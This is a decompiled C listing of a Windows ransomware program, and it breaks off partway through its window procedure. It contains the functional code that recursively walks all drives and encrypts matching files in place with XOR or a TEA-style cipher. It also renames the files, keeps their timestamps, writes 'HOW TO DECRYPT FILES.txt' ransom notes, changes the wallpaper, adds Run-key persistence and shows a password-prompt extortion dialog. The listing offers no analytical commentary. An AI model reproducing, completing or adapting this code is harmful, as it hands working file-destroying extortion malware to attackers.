/* This file was generated by the Hex-Rays decompiler version 9.4.0.260610.
   Copyright (c) 2007-2025 Hex-Rays <info@hex-rays.com>

   Detected compiler: Visual C++
*/

#include <windows.h>
#include <defs.h>


//-------------------------------------------------------------------------
// Function declarations

HRSRC sub_401000();
DWORD __stdcall sub_40103A(LPCSTR lpString2);
HRSRC sub_4010FC();
int sub_401216();
// int __usercall sub_40124F@<eax>(int a1@<eax>);
BOOL sub_401377();
char *sub_4013A8();
// unsigned int __usercall sub_401748@<eax>(unsigned int result@<eax>);
// unsigned __int32 __usercall sub_40177A@<eax>(unsigned __int32 result@<eax>);
// unsigned __int32 __usercall sub_401797@<eax>(unsigned __int32 result@<eax>);
unsigned int *__stdcall sub_4017B4(unsigned int *a1);
unsigned __int32 __stdcall sub_4017EC(unsigned int *a1, unsigned __int32 *a2);
unsigned __int32 __stdcall sub_4018B0(unsigned int *a1, unsigned __int32 *a2);
LRESULT __stdcall sub_401AB9(HWND hWnd, UINT Msg, WPARAM wParam, LPARAM lParam);
unsigned int __stdcall sub_401E5D(unsigned int a1, unsigned int a2);
HWND __stdcall sub_401E73(LPCSTR lpWindowName, int X, int Y, int nWidth, int nHeight, HWND hWndParent, HMENU hMenu);
HWND __stdcall sub_401EAB(LPCSTR lpWindowName, HWND hWndParent, int X, int Y, int nWidth, int nHeight, HMENU hMenu);
HWND __stdcall sub_401EE0(LPCSTR lpWindowName, HWND hWndParent, int X, int Y, int nWidth, int nHeight, HMENU hMenu);
BOOL __stdcall sub_401F15(BYTE *pbData, DWORD dwDataLen, BYTE *a3, DWORD pdwDataLen);
BOOL sub_401F87();
// int __userpurge __spoils<ecx> sub_40211B@<edx>(int a1@<ecx>, int a2@<edx>, char *a3, int a4);
HINSTANCE sub_40214B();
LSTATUS sub_4021C0();
// WPARAM __userpurge start@<eax>(int a1@<ebp>, int a2, int a3, int a4, int a5);
LSTATUS sub_402342();
LSTATUS __stdcall sub_402422(HKEY hKey, LPCSTR lpSubKey, LPCSTR lpValueName, LPCSTR lpString);
BOOL sub_402472();
// HDC __stdcall BeginPaint(HWND hWnd, LPPAINTSTRUCT lpPaint);
// HWND __stdcall CreateWindowExA(DWORD dwExStyle, LPCSTR lpClassName, LPCSTR lpWindowName, DWORD dwStyle, int X, int Y, int nWidth, int nHeight, HWND hWndParent, HMENU hMenu, HINSTANCE hInstance, LPVOID lpParam);
// LRESULT __stdcall DefWindowProcA(HWND hWnd, UINT Msg, WPARAM wParam, LPARAM lParam);
// LRESULT __stdcall DispatchMessageA(const MSG *lpMsg);
// BOOL __stdcall EndPaint(HWND hWnd, const PAINTSTRUCT *lpPaint);
// UINT __stdcall GetDlgItemTextA(HWND hDlg, int nIDDlgItem, LPSTR lpString, int cchMax);
// BOOL __stdcall GetMessageA(LPMSG lpMsg, HWND hWnd, UINT wMsgFilterMin, UINT wMsgFilterMax);
// int __stdcall GetSystemMetrics(int nIndex);
// HCURSOR __stdcall LoadCursorA(HINSTANCE hInstance, LPCSTR lpCursorName);
// int __stdcall MessageBoxA(HWND hWnd, LPCSTR lpText, LPCSTR lpCaption, UINT uType);
// BOOL __stdcall PeekMessageA(LPMSG lpMsg, HWND hWnd, UINT wMsgFilterMin, UINT wMsgFilterMax, UINT wRemoveMsg);
// ATOM __stdcall RegisterClassExA(const WNDCLASSEXA *);
// LRESULT __stdcall SendMessageA(HWND hWnd, UINT Msg, WPARAM wParam, LPARAM lParam);
// BOOL __stdcall SystemParametersInfoA(UINT uiAction, UINT uiParam, PVOID pvParam, UINT fWinIni);
// BOOL __stdcall TranslateMessage(const MSG *lpMsg);
// BOOL __stdcall UpdateWindow(HWND hWnd);
// BOOL __stdcall CloseHandle(HANDLE hObject);
// BOOL __stdcall CopyFileA(LPCSTR lpExistingFileName, LPCSTR lpNewFileName, BOOL bFailIfExists);
// HANDLE __stdcall CreateFileA(LPCSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, LPSECURITY_ATTRIBUTES lpSecurityAttributes, DWORD dwCreationDisposition, DWORD dwFlagsAndAttributes, HANDLE hTemplateFile);
// void __stdcall __noreturn ExitProcess(UINT uExitCode);
// BOOL __stdcall FindClose(HANDLE hFindFile);
// HANDLE __stdcall FindFirstFileA(LPCSTR lpFileName, LPWIN32_FIND_DATAA lpFindFileData);
// BOOL __stdcall FindNextFileA(HANDLE hFindFile, LPWIN32_FIND_DATAA lpFindFileData);
// HRSRC __stdcall FindResourceA(HMODULE hModule, LPCSTR lpName, LPCSTR lpType);
// BOOL __stdcall FreeResource(HGLOBAL hResData);
// LPSTR __stdcall GetCommandLineA();
// DWORD __stdcall GetEnvironmentVariableA(LPCSTR lpName, LPSTR lpBuffer, DWORD nSize);
// DWORD __stdcall GetFileAttributesA(LPCSTR lpFileName);
// DWORD __stdcall GetFileSize(HANDLE hFile, LPDWORD lpFileSizeHigh);
// BOOL __stdcall GetFileTime(HANDLE hFile, LPFILETIME lpCreationTime, LPFILETIME lpLastAccessTime, LPFILETIME lpLastWriteTime);
// DWORD __stdcall GetLogicalDrives();
// DWORD __stdcall GetModuleFileNameA(HMODULE hModule, LPSTR lpFilename, DWORD nSize);
// HMODULE __stdcall GetModuleHandleA(LPCSTR lpModuleName);
// HANDLE __stdcall GetProcessHeap();
// DWORD __stdcall GetTempPathA(DWORD nBufferLength, LPSTR lpBuffer);
// UINT __stdcall GetWindowsDirectoryA(LPSTR lpBuffer, UINT uSize);
// HGLOBAL __stdcall GlobalFree(HGLOBAL hMem);
// LPVOID __stdcall HeapAlloc(HANDLE hHeap, DWORD dwFlags, SIZE_T dwBytes);
// HGLOBAL __stdcall LoadResource(HMODULE hModule, HRSRC hResInfo);
// LPVOID __stdcall LockResource(HGLOBAL hResData);
// BOOL __stdcall MoveFileA(LPCSTR lpExistingFileName, LPCSTR lpNewFileName);
// BOOL __stdcall ReadFile(HANDLE hFile, LPVOID lpBuffer, DWORD nNumberOfBytesToRead, LPDWORD lpNumberOfBytesRead, LPOVERLAPPED lpOverlapped);
// int __stdcall RtlMoveMemory(_DWORD, _DWORD, _DWORD); weak
// UINT __stdcall SetErrorMode(UINT uMode);
// DWORD __stdcall SetFilePointer(HANDLE hFile, LONG lDistanceToMove, PLONG lpDistanceToMoveHigh, DWORD dwMoveMethod);
// BOOL __stdcall SetFileTime(HANDLE hFile, const FILETIME *lpCreationTime, const FILETIME *lpLastAccessTime, const FILETIME *lpLastWriteTime);
// DWORD __stdcall SizeofResource(HMODULE hModule, HRSRC hResInfo);
// BOOL __stdcall WriteFile(HANDLE hFile, LPCVOID lpBuffer, DWORD nNumberOfBytesToWrite, LPDWORD lpNumberOfBytesWritten, LPOVERLAPPED lpOverlapped);
// LPSTR __stdcall lstrcatA(LPSTR lpString1, LPCSTR lpString2);
// int __stdcall lstrcmpA(LPCSTR lpString1, LPCSTR lpString2);
// int __stdcall lstrcmpiA(LPCSTR lpString1, LPCSTR lpString2);
// LPSTR __stdcall lstrcpyA(LPSTR lpString1, LPCSTR lpString2);
// int __stdcall lstrlenA(LPCSTR lpString);
// BOOL __stdcall SHGetSpecialFolderPathA(HWND hwnd, LPSTR pszPath, int csidl, BOOL fCreate);
// HINSTANCE __stdcall ShellExecuteA(HWND hwnd, LPCSTR lpOperation, LPCSTR lpFile, LPCSTR lpParameters, LPCSTR lpDirectory, INT nShowCmd);
// BOOL __stdcall CryptAcquireContextA(HCRYPTPROV *phProv, LPCSTR szContainer, LPCSTR szProvider, DWORD dwProvType, DWORD dwFlags);
// BOOL __stdcall CryptCreateHash(HCRYPTPROV hProv, ALG_ID Algid, HCRYPTKEY hKey, DWORD dwFlags, HCRYPTHASH *phHash);
// BOOL __stdcall CryptDestroyHash(HCRYPTHASH hHash);
// BOOL __stdcall CryptGetHashParam(HCRYPTHASH hHash, DWORD dwParam, BYTE *pbData, DWORD *pdwDataLen, DWORD dwFlags);
// BOOL __stdcall CryptHashData(HCRYPTHASH hHash, const BYTE *pbData, DWORD dwDataLen, DWORD dwFlags);
// BOOL __stdcall CryptReleaseContext(HCRYPTPROV hProv, DWORD dwFlags);
// LSTATUS __stdcall RegCloseKey(HKEY hKey);
// LSTATUS __stdcall RegCreateKeyExA(HKEY hKey, LPCSTR lpSubKey, DWORD Reserved, LPSTR lpClass, DWORD dwOptions, REGSAM samDesired, const LPSECURITY_ATTRIBUTES lpSecurityAttributes, PHKEY phkResult, LPDWORD lpdwDisposition);
// LSTATUS __stdcall RegDeleteKeyA(HKEY hKey, LPCSTR lpSubKey);
// LSTATUS __stdcall RegSetValueExA(HKEY hKey, LPCSTR lpValueName, DWORD Reserved, DWORD dwType, const BYTE *lpData, DWORD cbData);
// LPSTR __stdcall PathAddBackslashA(LPSTR pszPath);
// LPSTR __stdcall PathFindExtensionA(LPCSTR pszPath);
// LPSTR __stdcall PathFindFileNameA(LPCSTR pszPath);
// BOOL __stdcall PathMatchSpecA(LPCSTR pszFile, LPCSTR pszSpec);
// HFONT __stdcall CreateFontIndirectA(const LOGFONTA *lplf);
// void __stdcall InitCommonControls();

//-------------------------------------------------------------------------
// Data declarations

CHAR ClassName[] = "0p3nSOurc3 X0r157, motherfucker!"; // idb
CHAR Name[] = "pussylicker"; // idb
CHAR aBmp[] = ".bmp"; // idb
CHAR asc_404032[] = "."; // idb
CHAR asc_404034[] = ".."; // idb
CHAR aExe[] = ".exe"; // idb
CHAR asc_404041[] = "*"; // idb
CHAR String2 = '\xCA'; // idb
CHAR aHowToDecryptFi[] = "HOW TO DECRYPT FILES.txt"; // idb
CHAR byte_404077 = '\xD4'; // idb
CHAR byte_4040BB = '\xCE'; // idb
CHAR aError[] = "Error!"; // idb
CHAR byte_4040CA = '\xCF'; // idb
CHAR aPasswordIsInco[] = "Password is incorrect!"; // idb
CHAR byte_4040F8 = '\xC2'; // idb
CHAR aAttentionAllYo[] = "Attention! All your files were encrypted!\r\nTo decrypt files, please enter correct password!"; // idb
CHAR byte_4041AB = '\xC2'; // idb
CHAR aYouHaveReached[] = "You have reached a limit of attempts - your data is irrevocably broken."; // idb
CHAR Text = '\xCF'; // idb
CHAR aEnteredPasswor[] = "Entered password is correct. Press OK to start decrypting of files. Dont close window and wait until message \"Files have been decrypted successfully!\" appears."; // idb
CHAR Class[] = "REG_SZ"; // idb
CHAR aDefaulticon[] = "\\DefaultIcon"; // idb
CHAR aShellOpenComma[] = "\\shell\\open\\command"; // idb
CHAR a0[3] = ",0"; // idb
CHAR SubKey[] = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"; // idb
CHAR ValueName[] = "Alcmeter"; // idb
CHAR aExplorerExe[] = "explorer.exe"; // idb
CHAR aCrypted[] = "CRYPTED!"; // idb
CHAR Caption = '\xC2'; // idb
CHAR WindowName[] = "Attention!"; // idb
CHAR aTahoma[] = "Tahoma"; // idb
CHAR byte_404414 = '\xCF'; // idb
CHAR aPassword[] = "Password:"; // idb
CHAR byte_404426 = '\xCE'; // idb
CHAR asc_404429[4] = "???"; // idb
CHAR byte_40442D = '\xC2'; // idb
CHAR aExit[] = "Exit"; // idb
CHAR aEdit[] = "EDIT"; // idb
CHAR aStatic[] = "STATIC"; // idb
CHAR aButton[] = "BUTTON"; // idb
CHAR byte_40444B[4] = { '\0', '\0', '\0', '\0' }; // idb
int dword_40444F = 0; // weak
char byte_404453[] = { '\0' }; // weak
char byte_404454[] = { '\0' }; // weak
char byte_404455 = '\0'; // weak
char byte_404456 = '\0'; // weak
CHAR ExistingFileName[1280]; // idb
CHAR Buffer[512]; // idb
CHAR pszSpec[512]; // idb
CHAR pszPath[512]; // idb
CHAR Filename[1278]; // idb
char byte_40594E[]; // weak
CHAR String[512]; // idb
CHAR NewFileName[2560]; // idb
char byte_406550; // weak
HANDLE hFile; // idb
int dword_406555; // weak
LPCVOID lpBuffer; // idb
DWORD nNumberOfBytesToWrite; // idb
DWORD NumberOfBytesWritten; // idb
BYTE byte_406565; // idb
BYTE byte_406575; // idb
int dword_406585; // weak
int dword_406589; // weak
int dword_40658D; // weak
int dword_406591; // weak
int dword_406595; // weak
int dword_406599; // weak
int dword_40659D; // weak
int dword_4065A1; // weak
int dword_4065A5; // weak
LONG lDistanceToMove; // idb
DWORD nNumberOfBytesToRead; // idb
HANDLE hHeap; // idb
CHAR byte_4065B9[256]; // idb
CHAR File[512]; // idb
CHAR Parameters[1280]; // idb
_BYTE dword_406DB9[16]; // weak
_UNKNOWN unk_406DBD; // weak
_UNKNOWN unk_406DC1; // weak
_UNKNOWN unk_406DC5; // weak
_UNKNOWN unk_406DC9; // weak
CHAR byte_406DD9[16]; // idb
CHAR byte_406DE9[16]; // idb
CHAR String1[32]; // idb
CHAR pvParam[512]; // idb
CHAR FileName[1280]; // idb
int dword_407519; // weak
LPCSTR lpText; // idb
LPCSTR lpSubKey; // idb
int dword_407525; // weak
char byte_407529; // weak
char byte_40752A; // weak
char byte_40752B; // weak
char byte_40752C; // weak
char byte_40752D; // weak
FILETIME stru_40752E; // idb
FILETIME stru_407536; // idb
FILETIME stru_40753E; // idb
FILETIME CreationTime; // idb
FILETIME LastAccessTime; // idb
FILETIME LastWriteTime; // idb
CHAR byte_40755E[512]; // idb
int dword_40775E; // weak
HWND hWnd; // idb
HINSTANCE hInstance; // idb
int dword_40776A; // weak
int dword_40776E; // weak
int dword_407772; // weak
int dword_407776; // weak
WPARAM wParam; // idb
LOGFONTA lf; // idb
BYTE pbData; // idb


//----- (00401000) --------------------------------------------------------
HRSRC sub_401000()
{
  SHGetSpecialFolderPathA(nullptr, pszPath, 16, true);
  sub_40103A(pszPath);
  if ( byte_40752B == 1 )
    MessageBoxA(nullptr, lpText, nullptr, 0x10u);
  return sub_4010FC();
}
// 40752B: using guessed type char byte_40752B;

//----- (0040103A) --------------------------------------------------------
DWORD __stdcall sub_40103A(LPCSTR lpString2)
{
  DWORD result; // eax
  DWORD v2; // eax

  lstrcpyA(FileName, lpString2);
  PathAddBackslashA(FileName);
  if ( byte_40752D == 1 )
    lstrcatA(FileName, &String2);
  else
    lstrcatA(FileName, aHowToDecryptFi);
  result = GetFileAttributesA(FileName);
  if ( result == -1 )
  {
    hFile = CreateFileA(FileName, 0x40000000u, 2u, nullptr, 2u, 0, nullptr);
    v2 = lstrlenA(lpText);
    WriteFile(hFile, lpText, v2, &NumberOfBytesWritten, nullptr);
    SetFileTime(hFile, &CreationTime, &LastAccessTime, &LastWriteTime);
    return CloseHandle(hFile);
  }
  return result;
}
// 40752D: using guessed type char byte_40752D;

//----- (004010FC) --------------------------------------------------------
HRSRC sub_4010FC()
{
  int v0; // ecx
  CHAR *v1; // edi
  unsigned __int64 v2; // rax
  HRSRC result; // eax
  HRSRC v4; // ebx
  HANDLE FileA; // eax
  DWORD NumberOfBytesWritten; // [esp+0h] [ebp-18h] BYREF
  HANDLE hFile; // [esp+4h] [ebp-14h]
  HRSRC hResInfo; // [esp+8h] [ebp-10h]
  DWORD nNumberOfBytesToWrite; // [esp+Ch] [ebp-Ch]
  HGLOBAL hResData; // [esp+10h] [ebp-8h]
  HRSRC v11; // [esp+14h] [ebp-4h]

  v0 = 16;
  v1 = String1;
  do
  {
    v2 = __rdtsc();
    *v1++ = ((unsigned __int8)(v2 & 0xF0) >> 4) + 97;
    --v0;
  }
  while ( v0 != 0 );
  *v1 = 0;
  lstrcatA(String1, aBmp);
  GetTempPathA(0x200u, pvParam);
  lstrcatA(pvParam, String1);
  result = FindResourceA(nullptr, Name, (LPCSTR)2);
  if ( result != nullptr )
  {
    hResInfo = result;
    result = (HRSRC)SizeofResource(nullptr, result);
    if ( result != nullptr )
    {
      nNumberOfBytesToWrite = (DWORD)result;
      result = (HRSRC)LoadResource(nullptr, hResInfo);
      if ( result != nullptr )
      {
        hResData = result;
        result = (HRSRC)LockResource(result);
        if ( result != nullptr )
        {
          v11 = result;
          v4 = result;
          FileA = CreateFileA(pvParam, 0xC0000000, 3u, nullptr, 2u, 0, nullptr);
          if ( FileA != (HANDLE)-1 )
          {
            hFile = FileA;
            SetFilePointer(FileA, 0, nullptr, 0);
            WriteFile(hFile, v4, nNumberOfBytesToWrite, &NumberOfBytesWritten, nullptr);
            SetFileTime(hFile, &CreationTime, &LastAccessTime, &LastWriteTime);
            CloseHandle(hFile);
            SystemParametersInfoA(0x14u, 0, pvParam, 3u);
          }
          return (HRSRC)FreeResource(hResData);
        }
      }
    }
  }
  return result;
}

//----- (00401216) --------------------------------------------------------
int sub_401216()
{
  if ( byte_40752D == 1 )
    MessageBoxA(nullptr, &Text, &Caption, 0x40u);
  else
    MessageBoxA(nullptr, aEnteredPasswor, WindowName, 0x40u);
  return sub_40124F(0);
}
// 40752D: using guessed type char byte_40752D;

//----- (0040124F) --------------------------------------------------------
int __usercall sub_40124F@<eax>(int a1@<eax>)
{
  unsigned __int64 v1; // rax
  DWORD LogicalDrives; // eax
  int v3; // ecx
  int result; // eax
  int v6; // [esp-8h] [ebp-10h]
  DWORD v7; // [esp-4h] [ebp-Ch]

  if ( a1 == -1 )
  {
    v1 = __rdtsc();
    *(_DWORD *)dword_406DB9 = v1;
    unk_406DBD = v1;
    unk_406DC1 = v1;
    unk_406DC5 = v1;
    dword_406595 = v1;
    dword_406599 = v1;
    dword_40659D = v1;
    dword_4065A1 = v1;
  }
  lstrcpyA(pszSpec, asc_404041);
  lstrcatA(pszSpec, asc_404032);
  lstrcatA(pszSpec, lpSubKey);
  if ( a1 == -1 )
    byte_406550 = 2;
  else
    byte_406550 = 1;
  SetErrorMode(1u);
  LogicalDrives = GetLogicalDrives();
  v3 = 25;
  do
  {
    if ( (LogicalDrives & (1 << v3)) != 0 )
    {
      BYTE1(dword_40444F) = v3 + 65;
      *(int *)((char *)&dword_40444F + 2) = 774528058;
      byte_404455 = 42;
      byte_404456 = 0;
      v7 = LogicalDrives;
      v6 = v3;
      sub_4013A8();
      v3 = v6;
      LogicalDrives = v7;
    }
  }
  while ( v3-- >= 1 );
  result = a1;
  if ( a1 != 0 )
  {
    if ( a1 == -1 )
    {
      if ( byte_40752D == 1 )
        return MessageBoxA(nullptr, &byte_4041AB, &Caption, 0x40u);
      else
        return MessageBoxA(nullptr, aYouHaveReached, WindowName, 0x40u);
    }
  }
  else if ( byte_40752D == 1 )
  {
    return MessageBoxA(nullptr, &byte_404077, &Caption, 0x40u);
  }
  else
  {
    return MessageBoxA(nullptr, &byte_404077, WindowName, 0x40u);
  }
  return result;
}
// 40444F: using guessed type int dword_40444F;
// 404455: using guessed type char byte_404455;
// 404456: using guessed type char byte_404456;
// 406550: using guessed type char byte_406550;
// 406595: using guessed type int dword_406595;
// 406599: using guessed type int dword_406599;
// 40659D: using guessed type int dword_40659D;
// 4065A1: using guessed type int dword_4065A1;
// 406DB9: using guessed type _BYTE dword_406DB9[16];
// 40752D: using guessed type char byte_40752D;

//----- (00401377) --------------------------------------------------------
BOOL sub_401377()
{
  BOOL result; // eax
  struct tagMSG Msg; // [esp+0h] [ebp-1Ch] BYREF

  while ( 1 )
  {
    result = PeekMessageA(&Msg, nullptr, 0, 0, 1u);
    if ( !result )
      break;
    TranslateMessage(&Msg);
    DispatchMessageA(&Msg);
  }
  return result;
}

//----- (004013A8) --------------------------------------------------------
char *sub_4013A8()
{
  char *result; // eax
  LPSTR FileNameA; // eax
  int v2; // eax
  int v3; // ecx
  const CHAR *v4; // edi
  BOOL matched; // ebx
  char *v6; // eax
  CHAR v7; // dl
  int v8; // ecx
  int *v9; // esi
  int *v10; // edi
  char v11; // al
  char v12; // al
  int v13; // [esp-4h] [ebp-148h]
  int v14; // [esp-4h] [ebp-148h]
  CHAR FindFileData[324]; // [esp+0h] [ebp-144h] BYREF

  result = (char *)FindFirstFileA((LPCSTR)&dword_40444F + 1, (LPWIN32_FIND_DATAA)FindFileData) + 1;
  if ( result != nullptr )
  {
    *(_DWORD *)&FindFileData[318] = result - 1;
    while ( 1 )
    {
      if ( (FindFileData[0] & 0x10) != 0 )
      {
        if ( lstrcmpA(asc_404032, &FindFileData[44]) != 0 && lstrcmpA(asc_404034, &FindFileData[44]) != 0 )
        {
          FileNameA = PathFindFileNameA((LPCSTR)&dword_40444F + 1);
          v13 = FileNameA - ((char *)&dword_40444F + 1);
          *FileNameA = 0;
          lstrcatA((LPSTR)&dword_40444F + 1, &FindFileData[44]);
          v2 = lstrlenA((LPCSTR)&dword_40444F + 1);
          *(int *)((char *)&dword_40444F + v2 + 1) = 707668572;
          byte_404454[v2] = 0;
          sub_4013A8();
          *(int *)((char *)&dword_40444F + v13) = 707668572;
          byte_404453[v13] = 0;
        }
      }
      else
      {
        sub_401377();
        if ( lstrcmpiA(&String2, &FindFileData[44]) != 0
          && lstrcmpiA(aHowToDecryptFi, &FindFileData[44]) != 0
          && lstrcmpiA(String1, &FindFileData[44]) != 0 )
        {
          *PathFindFileNameA((LPCSTR)&dword_40444F + 1) = 0;
          if ( byte_40752A == 1 )
            sub_40103A((LPCSTR)&dword_40444F + 1);
          lstrcatA((LPSTR)&dword_40444F + 1, &FindFileData[44]);
          if ( byte_406550 != 1 )
          {
            v3 = *(_DWORD *)dword_407519;
            v4 = (const CHAR *)(dword_407519 + 4);
            while ( 1 )
            {
              v14 = v3;
              matched = PathMatchSpecA((LPCSTR)&dword_40444F + 1, v4);
              v4 += lstrlenA(v4) + 1;
              if ( matched )
                break;
              v3 = v14 - 1;
              if ( v14 == 1 )
                goto LABEL_37;
            }
LABEL_19:
            lstrcpyA(ExistingFileName, (LPCSTR)&dword_40444F + 1);
            if ( byte_406550 != 0 )
            {
              if ( byte_406550 == 1 )
              {
                lstrcpyA(NewFileName, (LPCSTR)&dword_40444F + 1);
                *PathFindExtensionA(NewFileName) = 0;
              }
              else
              {
                lstrcpyA(NewFileName, (LPCSTR)&dword_40444F + 1);
              }
            }
            else
            {
              lstrcpyA(NewFileName, (LPCSTR)&dword_40444F + 1);
              lstrcatA(NewFileName, asc_404032);
              lstrcatA(NewFileName, lpSubKey);
            }
            v6 = (char *)CreateFileA(ExistingFileName, 0xC0000000, 3u, nullptr, 3u, 0, nullptr) + 1;
            if ( v6 != nullptr )
            {
              hFile = v6 - 1;
              dword_406555 = GetFileSize(v6 - 1, nullptr);
              if ( dword_406555 >= 8 )
              {
                GetFileTime(hFile, &stru_40752E, &stru_407536, &stru_40753E);
                SetFilePointer(hFile, lDistanceToMove, nullptr, 0);
                ReadFile(hFile, (LPVOID)lpBuffer, nNumberOfBytesToRead, &nNumberOfBytesToWrite, nullptr);
                if ( nNumberOfBytesToWrite != 0 )
                {
                  v7 = *PathFindFileNameA(ExistingFileName);
                  v8 = 16;
                  v9 = &dword_406595;
                  v10 = &dword_406585;
                  do
                  {
                    v11 = *(_BYTE *)v9;
                    v9 = (int *)((char *)v9 + 1);
                    v12 = v7 ^ v11;
                    v7 = __ROL1__(v7, 1);
                    *(_BYTE *)v10 = v12;
                    v10 = (int *)((char *)v10 + 1);
                    --v8;
                  }
                  while ( v8 != 0 );
                  if ( byte_40752C != 0 )
                  {
                    if ( byte_406550 != 0 )
                      sub_401797(nNumberOfBytesToWrite);
                    else
                      sub_40177A(nNumberOfBytesToWrite);
                  }
                  else
                  {
                    sub_401748(nNumberOfBytesToWrite);
                  }
                  SetFilePointer(hFile, lDistanceToMove, nullptr, 0);
                  WriteFile(hFile, lpBuffer, nNumberOfBytesToWrite, &NumberOfBytesWritten, nullptr);
                }
                SetFileTime(hFile, &stru_40752E, &stru_407536, &stru_40753E);
                CloseHandle(hFile);
                MoveFileA(ExistingFileName, NewFileName);
              }
              else
              {
                CloseHandle(hFile);
              }
            }
            goto LABEL_37;
          }
          if ( PathMatchSpecA((LPCSTR)&dword_40444F + 1, pszSpec) )
            goto LABEL_19;
        }
      }
LABEL_37:
      if ( !FindNextFileA(*(HANDLE *)&FindFileData[318], (LPWIN32_FIND_DATAA)FindFileData) )
        return (char *)FindClose(*(HANDLE *)&FindFileData[318]);
    }
  }
  return result;
}
// 40444F: using guessed type int dword_40444F;
// 406550: using guessed type char byte_406550;
// 406555: using guessed type int dword_406555;
// 406585: using guessed type int dword_406585;
// 406595: using guessed type int dword_406595;
// 407519: using guessed type int dword_407519;
// 40752A: using guessed type char byte_40752A;
// 40752C: using guessed type char byte_40752C;

//----- (00401748) --------------------------------------------------------
unsigned int __usercall sub_401748@<eax>(unsigned int result@<eax>)
{
  unsigned int v1; // ecx
  int *v2; // esi
  _DWORD *v3; // edi
  int v4; // edx
  int v5; // eax

  v1 = result >> 2;
  if ( result >> 2 != 0 )
  {
    if ( result != nNumberOfBytesToRead )
      ++v1;
    v2 = (int *)lpBuffer;
    v3 = lpBuffer;
    v4 = 0;
    do
    {
      if ( v4 == 16 )
        v4 = 0;
      v5 = *v2++;
      result = *(_DWORD *)&dword_406DB9[v4] ^ v5;
      *v3++ = result;
      v4 += 4;
      --v1;
    }
    while ( v1 != 0 );
  }
  return result;
}
// 406DB9: using guessed type _BYTE dword_406DB9[16];

//----- (0040177A) --------------------------------------------------------
unsigned __int32 __usercall sub_40177A@<eax>(unsigned __int32 result@<eax>)
{
  unsigned __int32 v1; // ebx
  unsigned int *v2; // esi

  v1 = result >> 3;
  if ( result >> 3 != 0 )
  {
    v2 = (unsigned int *)lpBuffer;
    do
    {
      result = sub_4017EC(v2, v2);
      v2 += 2;
      --v1;
    }
    while ( v1 != 0 );
  }
  return result;
}

//----- (00401797) --------------------------------------------------------
unsigned __int32 __usercall sub_401797@<eax>(unsigned __int32 result@<eax>)
{
  unsigned __int32 v1; // ebx
  unsigned int *v2; // esi

  v1 = result >> 3;
  if ( result >> 3 != 0 )
  {
    v2 = (unsigned int *)lpBuffer;
    do
    {
      result = sub_4018B0(v2, v2);
      v2 += 2;
      --v1;
    }
    while ( v1 != 0 );
  }
  return result;
}

//----- (004017B4) --------------------------------------------------------
unsigned int *__stdcall sub_4017B4(unsigned int *a1)
{
  unsigned __int32 v2; // edx
  unsigned __int32 v3; // edx

  v2 = _byteswap_ulong(a1[1]);
  dword_406595 = _byteswap_ulong(*a1);
  dword_406599 = v2;
  v3 = _byteswap_ulong(a1[3]);
  dword_40659D = _byteswap_ulong(a1[2]);
  dword_4065A1 = v3;
  return a1;
}
// 406595: using guessed type int dword_406595;
// 406599: using guessed type int dword_406599;
// 40659D: using guessed type int dword_40659D;
// 4065A1: using guessed type int dword_4065A1;

//----- (004017EC) --------------------------------------------------------
unsigned __int32 __stdcall sub_4017EC(unsigned int *a1, unsigned __int32 *a2)
{
  int v2; // ebx
  unsigned int v3; // eax
  unsigned int v4; // edx
  int v5; // ebx
  unsigned int v6; // eax
  unsigned int v7; // edx
  unsigned __int32 result; // eax

  v2 = 0;
  v3 = _byteswap_ulong(*a1);
  v4 = _byteswap_ulong(a1[1]);
  do
  {
    v5 = v2 - 1640531527;
    v6 = ((dword_406589 + (v4 >> 5)) ^ (v5 + v4) ^ (dword_406585 + 16 * v4)) + v3;
    v7 = ((dword_406591 + (v6 >> 5)) ^ (v5 + v6) ^ (dword_40658D + 16 * v6)) + v4;
    v2 = v5 - 1640531527;
    v3 = ((dword_406589 + (v7 >> 5)) ^ (v2 + v7) ^ (dword_406585 + 16 * v7)) + v6;
    v4 = ((dword_406591 + (v3 >> 5)) ^ (v2 + v3) ^ (dword_40658D + 16 * v3)) + v7;
  }
  while ( v2 != -1640531527 * dword_4065A5 );
  result = _byteswap_ulong(v3);
  *a2 = result;
  a2[1] = _byteswap_ulong(v4);
  return result;
}
// 406585: using guessed type int dword_406585;
// 406589: using guessed type int dword_406589;
// 40658D: using guessed type int dword_40658D;
// 406591: using guessed type int dword_406591;
// 4065A5: using guessed type int dword_4065A5;

//----- (004018B0) --------------------------------------------------------
unsigned __int32 __stdcall sub_4018B0(unsigned int *a1, unsigned __int32 *a2)
{
  int v2; // ebx
  unsigned int v3; // eax
  unsigned int v4; // edx
  unsigned int v5; // edx
  unsigned int v6; // eax
  int v7; // ebx
  unsigned __int32 result; // eax

  v2 = -1640531527 * dword_4065A5;
  v3 = _byteswap_ulong(*a1);
  v4 = _byteswap_ulong(a1[1]);
  do
  {
    v5 = v4 - ((dword_406591 + (v3 >> 5)) ^ (v2 + v3) ^ (dword_40658D + 16 * v3));
    v6 = v3 - ((dword_406589 + (v5 >> 5)) ^ (v2 + v5) ^ (dword_406585 + 16 * v5));
    v7 = v2 + 1640531527;
    v4 = v5 - ((dword_406591 + (v6 >> 5)) ^ (v7 + v6) ^ (dword_40658D + 16 * v6));
    v3 = v6 - ((dword_406589 + (v4 >> 5)) ^ (v7 + v4) ^ (dword_406585 + 16 * v4));
    v2 = v7 + 1640531527;
  }
  while ( v2 != 0 );
  result = _byteswap_ulong(v3);
  *a2 = result;
  a2[1] = _byteswap_ulong(v4);
  return result;
}
// 406585: using guessed type int dword_406585;
// 406589: using guessed type int dword_406589;
// 40658D: using guessed type int dword_40658D;
// 406591: using guessed type int dword_406591;
// 4065A5: using guessed type int dword_4065A5;

//----- (00401AB9) --------------------------------------------------------
LRESULT __stdcall sub_401AB9(HWND hWnd, UINT Msg, WPARAM wParam, LPARAM lParam)
{
  DWORD v4; // eax
  int v5; // ecx
  BYTE *v6; // esi
  char *v7; // edi
  char v8; // al
  char v9; // dl
  HWND v10; // eax
  HWND v11; // eax
  struct tagPAINTSTRUCT Paint; // [esp+0h] [ebp-44h] BYREF

  switch ( Msg )
  {
    case 0x111u:
      switch ( wParam )
      {
        case 0x1F5u:
          ExitProcess(0);
        case 0x1F6u:
          if ( byte_40752D == 1 )
            MessageBoxA(hWnd, &byte_4040F8, &Caption, 0x40u);
          else
            MessageBoxA(hWnd, aAttentionAllYo, WindowName, 0x40u);
          break;
        case 0x1F4u:
          if ( dword_407525 == 0 )
          {
            sub_40124F(-1);
            sub_4021C0();
            sub_40214B();
